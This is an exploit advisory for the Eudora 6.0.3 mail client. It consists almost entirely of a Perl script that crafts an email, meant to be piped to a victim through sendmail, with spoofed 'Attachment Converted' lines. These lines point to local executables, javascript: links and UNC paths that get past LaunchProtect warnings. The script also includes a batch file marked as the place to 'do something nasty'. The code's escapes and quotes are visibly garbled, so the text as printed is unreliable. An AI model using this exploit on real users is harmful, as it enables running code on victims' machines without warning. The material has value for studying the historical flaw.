‘Eudora Attachment Spoof Exploit Revisited’
Summary
‘Eudora is an advanced Email client for Windows/Mac. A known security bug that has been known for years is still present in the newest release of Eudora.’
Credit:
‘The information has been provided by paul szaboq.
The original article can be found at: https://securiteam.com/exploits/5FP0G15B5O.html‘
Details
‘Vulnerable Systems:
* Eudora version 6.0.3
Exploit
#!/usr/bin/perl —
use MIME::Base64;
print ‘From: men’;
print ‘To: youn’;
print ‘Subject: Eudora 6.0.3 on Windows spoof, LaunchProtectn’;
print ‘MIME-Version: 1.0n’;
print ‘Content-Type: multipart/mixed; boundary=’zzz’n’;
print ‘n’;
print ‘This is a multi-part message in MIME format.n’;
print ‘–zzzn’;
print ‘Content-Type: text/plainn’;
print ‘Content-Transfer-Encoding: 7bitn’;
print ‘n’;
print ‘Pipe the output of this script into: sendmail -i victimn’;
print ‘nWith spoofed attachments, we could ‘steal’ files if the message
was forwarded (not replied to).n’;
print ‘nWithin plain-text email (or plain-text, inline MIME parts) embedded
CR=x0d characters get converted internally into a NUL=x00 and ignored,
so we can spoof ‘attachment converted’ lines:n’;
print ‘nThe following work fine (but are boring and/or put up warnings):n’;
print ‘Attachment Convertedr: ‘c:\winnt\system32\calc.exe’n’;
print ‘Attachment Convertedr: c:\winnt\system32\calc.exen’;
print ‘(Note how JavaScript is done with IE, web with default browser Netscape)n’;
print ‘Attachment Convertedr: <A href=javascript:alert(%27hello%27)>hello.txt</a>n’;
print ‘Attachment Convertedr: <A href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>n’;
print ‘Attachment Convertedr: <A href=c:/winnt/system32/calc.exe>file.txt</a>n’;
print ‘nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:n’;
print ‘Attachment Convertedr: <A href=H:/eudora/attach/calc>file.txt</a>n’;
print ‘nCuteness value only:n’;
print ‘Attachment Convertedr: <A href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>n’;
print ‘n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a href=’http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx’>http</a>
and
<a href=’javascript:alert(x27hellox27)’>javascript</a>
references. Any way to exploit this?
</x-html>n’;
print ‘n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>n’;
print ‘nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:nn’;
print ‘HTMLn’;
print ‘<x-html></x-html>Attachment Converted: ‘xyz’n’;
print ‘Richn’;
print ‘<x-rich></x-rich>Attachment Converted: ‘xyz’n’;
print ‘Flowedn’;
print ‘<x-flowed></x-flowed>Attachment Converted: ‘xyz’n’;
print ‘n’;
print ‘n–zzzn’;
print ‘Content-Type: text/plain; name=’plain.txt’n’;
print ‘Content-Transfer-Encoding: 7bitn’;
print ‘Content-Disposition: inline; filename=’plain.txt’n’;
print ‘n’;
print ‘Within a ‘plain’ attachment:n’;
print ‘Attachment Convertedr: ‘c:\winnt\system32\calc.exe’n’;
print ‘n–zzzn’;
print ‘Content-Type: text/plain; name=’qp.txt’n’;
print ‘Content-Transfer-Encoding: quoted-printable n’;
print ‘Content-Disposition: inline; filename=’qp.txt’n’;
print ‘n’;
print ‘Within quoted-printable encoded parts still need the embedded CR:n’;
print ‘=41ttachment=20=43onvertedr=3a ‘c:\winnt\system32\calc.exe’n’;
print ‘n–zzzn’;
print ‘Content-Type: text/plain; name=’b64.txt’n’;
print ‘Content-Transfer-Encoding: base64n’;
print ‘Content-Disposition: inline; filename=’b64.txt’n’;
print ‘n’;
$z = ‘Within base64 encoded (plain-text, inline) MIME parts, can spoofr
without embedded CR (but line termination is CR-NL):r
Attachment Converted: ‘c:\winnt\system32\calc.exe’rn’;
print encode_base64($z);
print ‘n–zzzn’;
print ‘Content-Type: text/plainn’;
print ‘Content-Transfer-Encoding: 7bitn’;
print ‘n’;
print ‘n=====n’;
$X = ‘README’; $Y = ‘$X.bat’;
print ‘nThe X – X.exe dichotomy: send a plain $X attachment:n’;
$z = ‘rem Funny jokernpausern’;
print ‘begin 600 $Xn’, pack(‘u’,$z), ‘`nendn’;
print ‘nand (in another message or) after some blurb so is scrolled off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LauchProtect warning):n’;
$z = ‘rem Big jokernrem Should do something nastyrnpausern’;
print ‘begin 600 $Yn’, pack(‘u’,$z), ‘`nendn’;
print ‘n=====n’;
print ‘
Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an executable
stored elsewhere to run without warning:n’;
print ‘Attachment Convertedr: <a href=c:/winnt/system32/calc>go.txt</a>n’;
print ‘Attachment Convertedr: c:/winnt/system32/calcn’;
print ‘
Can be exploited if there is more than one way into attach: in my setup
H: and \\rome\home are the same thing, but Eudora does not know that.n’;
print ‘These elicit warnings:n’;
print ‘Attachment Convertedr: <a href=h:/eudora/attach/README>readme.txt</a>n’;
print ‘Attachment Convertedr: h:/eudora/attach/READMEn’;
print ‘Attachment Convertedr: \READMEn’;
print ‘Attachment Convertedr: .\READMEn’;
print ‘Attachment Convertedr: \.\READMEn’;
print ‘Attachment Convertedr: \READMEn’;
print ‘Attachment Convertedr: \ \READMEn’;
print ‘while these do the bad thing without warning:n’;
print ‘Attachment Convertedr: <a href=file://rome/home/eudora/attach/README>readme</a>n’;
print ‘Attachment Convertedr: //rome/home/eudora/attach/READMEn’;
print ‘Attachment Convertedr: \\rome\home\eudora\attach\READMEn’;
print ‘
For the default setup, Eudora knows that C:\Program Files
and C:\Progra~1 are the same thing:n’;
print ‘Attachment Convertedr: ‘c:/program files/qualcomm/eudora/attach/README’n’;
print ‘Attachment Convertedr: ‘c:/progra~1/qualcomm/eudora/attach/README’n’;
print ‘
and also knows that various UNC references:
\\localhost\c…
\\127.0.0.1\c…
\\BIOSNAME\c…
\\DNSNAME\c…
\\IP\c…
\\\?\c…
\\c…
…c:\progr…
…c\progr…
…c:progr…
…program files\…
…progra~1\…
or even
.\NoSuchDir\..\README
//c|\Program Files\qualcomm\eudora\attach\README
\\c|\Program Files\qualcomm\eudora\attach\README
res://c:\Program Files\qualcomm\eudora\attach\README
res:\\c:\Program Files\qualcomm\eudora\attach\README
shell:Fonts\..\..\Program Files\qualcomm\eudora\attach\README
%ProgramFiles%\qualcomm\eudora\attach\README
%windir%\..\Program Files\qualcomm\eudora\attach\README
are all the same thing…
‘;
print ‘n’;
print ‘n–zzz–n’;
print ‘n’;’